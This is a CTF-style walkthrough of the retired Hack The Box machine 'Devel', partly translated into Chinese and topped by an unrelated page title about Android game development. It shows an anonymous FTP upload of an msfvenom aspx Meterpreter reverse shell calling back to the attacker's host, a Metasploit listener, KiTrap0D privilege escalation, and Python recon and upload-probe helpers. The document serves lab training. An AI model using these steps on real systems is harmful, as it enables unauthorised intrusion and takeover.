安卓游戲開發推箱子
Hack The Box (HTB) is an online platform that lets you test your penetration testing skills. It contains a number of challenges that are constantly updated. Some of them simulate real-world scenarios and some lean more towards a CTF style of challenge.
Note. Only write-ups of retired HTB machines are allowed.
Devel is described as a relatively simple box that demonstrates the security risks associated with some default program configurations. It is a beginner-level machine that can be completed using publicly available exploits.
We will use the following tools, running on a Kali Linux box, to pwn the machine:
nmap
zenmap
searchsploit
metasploit
msfvenom
Step 1 - Scanning the network
The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.
This is one of the most important parts, as it determines what you can try to exploit afterwards. It is always better to spend more time on this phase to get as much information as possible.
I will use Nmap (Network Mapper), a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
There are many options you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.
I use the following command to get a basic idea of what we are scanning (OS detection needs raw sockets, so run it as root or with sudo):
nmap -sV -O -F --version-light 10.10.10.5
-sV: Probe open ports to determine service/version info
-O: Enable OS detection
-F: Fast mode - scan fewer ports than the default scan
--version-light: Limit to most likely probes (intensity 2)
10.10.10.5: IP address of the Devel box
You can also use Zenmap, the official Nmap Security Scanner GUI. It is a multi-platform, free and open source application that aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users.
I use a different set of options to perform an intensive scan:
nmap -A -v 10.10.10.5
-A: Enable OS detection, version detection, script scanning, and traceroute
-v: Increase verbosity level
10.10.10.5: IP address of the Devel box
If you find the results a little overwhelming, you can move to the Ports/Hosts tab in Zenmap to see only the open ports.
We can see that there are 2 open ports:
Port 21. File Transfer Protocol (FTP) control (command). Here it is a Microsoft FTP server.
Port 80. Hypertext Transfer Protocol (HTTP). Here it is an IIS server.
The most likely initial attack vector in this case appears to be the FTP server.
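The interesting facts in the `-A` scan (which ports are open, what versions run, and whether the `ftp-anon` NSE script reported anonymous login and listed files) are buried in nmap's normal output. The following Python script is an added example, not part of the original article or of nmap: it parses nmap's normal output into per-port records with their NSE script blocks and extracts exactly those facts. The embedded scan text is a constructed sample in the shape nmap prints, reproducing only what the article states (ports 21 and 80, Microsoft FTP with anonymous login, IIS, iisstart.htm and welcome.png); the dates, sizes and the aspnet_client directory are made up for the sample.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in the shape of `nmap -A` normal output. It is not the
# scan from the article; it only reproduces the facts the article states
# (ports 21 and 80 open, Microsoft FTP with anonymous login, IIS, and the two
# files iisstart.htm and welcome.png). Dates, sizes and aspnet_client are made up.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.5
Host is up (0.045s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 01-01-17  12:00AM       <DIR>          aspnet_client
| 01-01-17  12:00AM                  689 iisstart.htm
|_01-01-17  12:00AM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd
|_http-title: IIS7
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SCRIPT_RE = re.compile(r"^([a-z][a-z0-9-]*):\s*(.*)$")        # "| ftp-anon: ..." header line
FTP_LIST_RE = re.compile(r"^\S+\s+\S+\s+(<DIR>|\d+)\s+(.+)$")  # "date time <DIR>|size name"


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str
    scripts: dict = field(default_factory=dict)  # NSE script id -> output lines


def parse_nmap(text):
    """Parse nmap normal output into Service records, keeping NSE script output per port."""
    services, current, script = [], None, None
    for raw in text.splitlines():
        m = PORT_RE.match(raw)
        if m:
            current = Service(int(m[1]), m[2], m[3], m[4], m[5].strip())
            services.append(current)
            script = None
            continue
        if current is None or not raw.startswith("|"):
            continue
        body = raw[1:].lstrip("_")             # "|_" marks the last line of a script block
        indent = len(body) - len(body.lstrip(" "))
        header = SCRIPT_RE.match(body.strip())
        if header and indent <= 1:             # a script header has at most one space after "|"
            script = header[1]
            current.scripts[script] = [header[2]] if header[2] else []
        elif script:                           # continuation line of the current script
            current.scripts[script].append(body.strip())
    return services


def anonymous_ftp_listing(services):
    """Names from the ftp-anon listing (directories get a trailing '/'),
    or None when no open FTP service allowed anonymous login."""
    for s in services:
        lines = s.scripts.get("ftp-anon", [])
        if s.state != "open" or not lines or "login allowed" not in lines[0]:
            continue
        names = []
        for line in lines[1:]:
            m = FTP_LIST_RE.match(line)
            if m:
                names.append(m[2] + ("/" if m[1] == "<DIR>" else ""))
        return names
    return None


def summarize(text):
    """The recon facts the rest of the write-up relies on, in one dictionary."""
    services = parse_nmap(text)
    listing = anonymous_ftp_listing(services)
    return {
        "open_ports": [s.port for s in services if s.state == "open"],
        "versions": {s.port: s.version for s in services if s.state == "open"},
        "anonymous_ftp": listing is not None,
        "ftp_files": listing or [],
    }


if __name__ == "__main__":
    import json
    import sys
    scan = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_NMAP_OUTPUT
    print(json.dumps(summarize(scan), indent=2))
```

Run it as `nmap -A -v 10.10.10.5 -oN scan.txt && python3 nmap_summary.py < scan.txt`; without input on stdin it parses the embedded sample. The `anonymous_ftp` and `ftp_files` fields are what tell you, before touching the box by hand, that the next step is worth trying.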
Step 2 - The vulnerable FTP
We open Firefox and visit the website at http://10.10.10.5
From the reconnaissance phase, we found 2 files on the Microsoft FTP server. Let's see if we can access them from the browser.
I can access the welcome.png image file by visiting
http://10.10.10.5/welcome.png
I can also access the iisstart.htm page
http://10.10.10.5/iisstart.htm
We now know two things:
- The FTP root is the web server's document root - discovered when we reached the files seen during the recon phase through the browser.
- The FTP server allows anonymous login - discovered when we performed the intense scan.
Let's see if we can create a file and upload it to the FTP server.
I create a test file with this command, redirecting the output to a file called htb.html
echo HackTheBox > htb.html
I then check with ls that the file has been created, and look at its content with this command
cat htb.html
Let's now connect to the FTP server to add our test file.
To connect to the FTP server, I use this command
ftp 10.10.10.5
I type anonymous as the username and just press enter for the password, as the server allows anonymous login.
I am now connected to the FTP server.
I upload the file with this command
put htb.html
The file has been successfully sent over. Let's check if we can access it from Firefox. I visit the page and we can see the output HackTheBox on the web page.
http://10.10.10.5/htb.html
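The manual sequence above (anonymous login, upload a marker, fetch it over HTTP) is the check that proves the FTP root and the web root are the same directory. The following Python script is an added example, not code from the original article: it automates that check with the standard library's `ftplib` and `urllib`, using a random file name and random content so that a cached or pre-existing page cannot produce a false positive, and it removes the marker afterwards. The FTP and HTTP steps are passed in as functions so the decision logic can be exercised offline with fakes; the target address 10.10.10.5 is the article's, everything else is an assumption of this example.

```python
import ftplib
import io
import secrets
import urllib.error
import urllib.request


def ftp_anonymous_put(host, name, data, timeout=10):
    """Log in as anonymous (ftplib sends 'anonymous' / 'anonymous@') and STOR the bytes."""
    try:
        with ftplib.FTP(host, timeout=timeout) as ftp:
            ftp.login()
            ftp.storbinary(f"STOR {name}", io.BytesIO(data))
        return True
    except ftplib.all_errors:
        return False


def ftp_anonymous_delete(host, name, timeout=10):
    """Remove the marker again so nothing is left behind on the target."""
    try:
        with ftplib.FTP(host, timeout=timeout) as ftp:
            ftp.login()
            ftp.delete(name)
        return True
    except ftplib.all_errors:
        return False


def http_get(url, timeout=10):
    """GET a URL and return (status, body); HTTP errors come back as a status, not an exception."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, b""
    except (urllib.error.URLError, OSError):
        return None, b""


def check_ftp_webroot_overlap(host, put=ftp_anonymous_put, get=http_get):
    """Upload a random marker over anonymous FTP, then ask the web server for it.
    Both network steps are injectable so the logic can be tested without a target."""
    name = f"probe-{secrets.token_hex(8)}.html"
    body = secrets.token_hex(16).encode()   # random content: a stale or pre-existing file cannot match
    result = {"marker": name, "anonymous_write": False, "served_by_web": False}
    if not put(host, name, body):
        return result
    result["anonymous_write"] = True
    status, fetched = get(f"http://{host}/{name}")
    result["served_by_web"] = status == 200 and body in fetched
    return result


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.5"
    outcome = check_ftp_webroot_overlap(target)
    print(outcome)
    if outcome["anonymous_write"]:
        ftp_anonymous_delete(target, outcome["marker"])
```

`anonymous_write` true on its own is already a finding (anyone can fill the disk or host content); `served_by_web` true as well means anything uploaded with an extension the server executes will run, which is what the next step relies on.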
Now that we know we can upload files into the document root of an IIS server, which executes ASP.NET pages, let's craft an exploit!
Step 3 - Using MSFvenom to craft an exploit
We will use MSFvenom, which is a payload generator. You can learn more about it here.
But first, let's check in the Metasploit Framework which payload we will need to craft our exploit.
We know that we need a reverse shell, a type of shell in which the target machine initiates the connection back to the attacking machine. The attacking machine runs a listener on a chosen port; once the target connects to it, the attacker executes code or commands on the target through that connection.
The reverse TCP shell should be for Windows and we will use Meterpreter.
From the Offensive Security website, we get this definition of Meterpreter:
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
You can read more about Meterpreter here.
I launch Metasploit and search for reverse TCP payloads. I use the following command
search windows/meterpreter/reverse_tcp
We find an interesting payload, number 2 in my results, which is a Reverse TCP Stager. This payload injects the meterpreter server DLL via the Reflective Dll Injection payload and connects back to the attacker.
payload/windows/meterpreter/reverse_tcp
Now let's go back to msfvenom to craft our exploit, more specifically an aspx reverse shell. We know from the recon phase that the server is IIS, which executes ASP.NET pages.
I use the following command
msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o devel.aspx LHOST=10.10.14.15 LPORT=4444
-p: Payload to use
-f: Output format
-o: Save the payload to a file
LHOST: Local host, the attacker's address on the HTB VPN interface
LPORT: Local port the handler will listen on
I then check with ls that the file has been created. It's time to send it over to the FTP server.
Let's reconnect to the FTP server and send our little gift!
I connect to the FTP server, enter anonymous as the username and skip the password by pressing enter. I then send the file with the following command
put devel.aspx
Let's check that the file has been correctly sent over. Going back to Firefox, I navigate to the FTP server at the following address
ftp://10.10.10.5
We can see that our little gift is here!
Here is the exploit, if you're curious to know what it looks like
Step 4 - Setting up a listener with Metasploit
Back in Metasploit, I use the following command to select the payload handler
use exploit/multi/handler
I check to see which options are available.
We first set the payload
set payload windows/meterpreter/reverse_tcp
Then the LHOST
set lhost 10.10.14.15
And finally the LPORT
set lport 4444
If we check the options now, we should see that everything is set up.
Let's run the exploit.
After this message appears
Started reverse TCP handler on 10.10.14.15:4444
go back to the browser and access the page where the malicious script is hosted
http://10.10.10.5/devel.aspx
You should then see a Meterpreter session being created.
Now that I have a session, I try to look for the first flag, user.txt, using the following command in Meterpreter
search -f user.txt
No files match my search. I try with .* to see other files, but nothing useful.
I then create a shell with the following command
shell
I use the following command to get the system information
systeminfo
We can see that the registered owner is called babis. This might be an important piece of information when we look for the user flag. We can also see that the machine doesn't have any hotfixes installed.
I start navigating through the folders. I use dir to list all files/folders and cd to change directory. I try my luck on the babis and Administrator folders, but both give me Access denied: the shell runs as the low-privileged IIS user, which cannot read other users' profile directories.
We need to escalate privileges! Knowing that no hotfixes were found when we checked the system information, we can try to find exploits applicable to this machine.
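The `systeminfo` output is read by eye in the write-up: owner, architecture, hotfix list. The following Python script is an added example, not code from the original article or from Metasploit: it parses that output and applies the same reasoning the next step uses (the KiTrap0D module is x86-only, and a host that has not received the MS10-015 hotfix, KB977165, is a candidate for it). It goes slightly beyond the article by checking for that specific KB rather than only for "no hotfixes". The two embedded outputs are constructed samples in the shape `systeminfo` prints, not the article's output: the first mirrors only what the write-up reports (owner babis, x86, no hotfixes), the second is a patched x86 host for contrast; host names, OS name/version and the second KB are illustrative.

```python
import re

# Constructed samples in the shape of Windows `systeminfo` output. Not the
# article's output: the first mirrors only what the write-up reports (owner
# babis, x86, no hotfixes); the second is a patched x86 host for contrast.
SAMPLE_UNPATCHED = """\
Host Name:                 TARGET
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
Registered Owner:          babis
System Type:               X86-based PC
Hotfix(s):                 N/A
"""

SAMPLE_PATCHED = """\
Host Name:                 PATCHED
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7601 Service Pack 1 Build 7601
Registered Owner:          someone
System Type:               X86-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB977165
                           [02]: KB976902
"""

FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z0-9 ()/-]*?):\s*(.*)$")   # "Key:   value" rows
HOTFIX_RE = re.compile(r"\[\d+\]:\s*(KB\d+)")                        # "[01]: KB977165" rows
MS10_015_KB = "KB977165"   # the hotfix Microsoft shipped for bulletin MS10-015 (KiTrap0D)


def parse_systeminfo(text):
    """Turn systeminfo output into a dict of fields plus a list of installed KBs."""
    info = {"hotfixes": []}
    for line in text.splitlines():
        kb = HOTFIX_RE.search(line)
        if kb:
            info["hotfixes"].append(kb[1])
            continue
        m = FIELD_RE.match(line)
        if m:
            info[m[1].strip()] = m[2].strip()
    return info


def is_x86(info):
    return info.get("System Type", "").lower().startswith("x86")


def kitrap0d_candidate(info):
    """The write-up's reasoning made explicit: the Metasploit module is x86-only,
    and a host whose hotfix list lacks KB977165 has not received the MS10-015 fix
    (a host with no hotfixes at all trivially qualifies)."""
    return is_x86(info) and MS10_015_KB not in info["hotfixes"]


def triage(text):
    """Summary a pentester wants before reaching for local_exploit_suggester."""
    info = parse_systeminfo(text)
    return {
        "owner": info.get("Registered Owner"),
        "arch": info.get("System Type"),
        "hotfix_count": len(info["hotfixes"]),
        "try_ms10_015_kitrap0d": kitrap0d_candidate(info),
    }


if __name__ == "__main__":
    import sys
    raw = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_UNPATCHED
    print(triage(raw))
```

Treat the result as a hint, not proof: service packs roll up earlier fixes, so a Windows 7 SP1 host will not list KB977165 yet is not vulnerable to KiTrap0D, and a missing KB on the list can also mean the listing is incomplete. That is why the write-up still runs local_exploit_suggester and then the module's own check instead of trusting systeminfo alone.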
Step 5 - Performing Privilege Escalation
I put the session in the background with this command
background
I then use the following command
use post/multi/recon/local_exploit_suggester
This module suggests local Meterpreter exploits that can be used. The exploits are suggested based on the architecture and platform of the session the user has open, as well as the exploits available in Metasploit.
I check the options and set the session.
It's important to note that not all local exploits will be tried. Exploits are chosen based on these conditions: session type, platform, architecture, and required default options.
Going down the list,
exploit/windows/local/bypassuac_eventvwr
fails because the IIS user is not a member of the Administrators group, which is the default and to be expected: a UAC bypass only turns a filtered administrator token into a full one and does nothing for a non-administrator.
I use the next exploit on the list, which is
use exploit/windows/local/ms10_015_kitrap0d
This module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.
When we ran systeminfo in the shell (Meterpreter's sysinfo shows the same), it revealed that the target is x86.
I check the options and then set the session.
I run the exploit.
The exploit was successful, but the session couldn't be created. This is because the module's LHOST defaulted to the address of my first interface (eth0, 10.0.2.15) and the default port, not to the HTB lab VPN interface, so the elevated payload connected back to an address the target cannot reach:
Started reverse TCP handler on 10.0.2.15:4444
I check the options, set LHOST to my VPN address and LPORT, and run the exploit again.
I then list all live sessions with the following command, in case my original session died
sessions -l
I can see my new session.
Now that we have an elevated meterpreter session, let's start navigating the folders and find the flags!
步驟6-尋找user.txt標志 (Step 6 - Looking for the user.txt flag)
Let's first check where we are with the following command
我們首先使用以下命令檢查我們的位置
pwd
which stands for print work directory
代表打印工作目錄
I go up to C:\ and ls all the files/folders. I already know where to look from my previous attempt in Step 4 - Setting up a listener with Metasploit
我要到C:\和LS中的所有文件/文件夾。 我從步驟4-使用Metasploit設置偵聽器中的上一次嘗試中已經知道要看的地方
I go back to the Users directory
我回到用戶目錄
Then move to the babis directory
然后移至babis目錄
From there, I go to the Desktop directory
從那里,我轉到桌面目錄
We found the user.txt.txt file! To read the content of the file I use the command
我們找到了user.txt.txt文件! 要讀取文件的內容,請使用以下命令
cat user.txt.txt
Now that we have the user flag, let's find the root flag!
現在有了用戶標志,讓我們找到根標志!
步驟7-尋找root.txt標志 (Step 7 - Looking for the root.txt flag)
Going back to C:\ to navigate to the Administrator folder then the Desktop folder. I use ls to list all files under the Desktop folder
返回到C:\ ,導航到Administrator文件夾,然后導航到Desktop文件夾。 我使用ls列出“ 桌面”文件夾下的所有文件
We find the root.txt.txt file!
我們找到了root.txt.txt文件!
To read the content of the file I use the command
要讀取文件的內容,請使用以下命令
cat root.txt.txt
Congrats! You found both flags!
恭喜! 您找到了兩個標志!
Please don’t hesitate to comment, ask questions or share with your friends :)
請不要猶豫,發表評論,提問或與您的朋友分享:)
You can see more of my articles here
您可以在這里看到更多我的文章
You can follow me on Twitter or on LinkedIn
您可以在Twitter或LinkedIn上關注我
And don't forget to #GetSecure, #BeSecure & #StaySecure!
并且不要忘記# GetSecure ,# BeSecure和#StaySecure !
Other Hack The Box articles
其他Hack The Box文章
Keep Calm and Hack The Box - Lame
保持冷靜并砍箱子-me腳
Keep Calm and Hack The Box - Legacy
保持冷靜并打破常規-舊版
Keep Calm and Hack The Box - Beep
保持冷靜并砍箱子-嗶
Translated from: https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-devel/
安卓游戲開發推箱子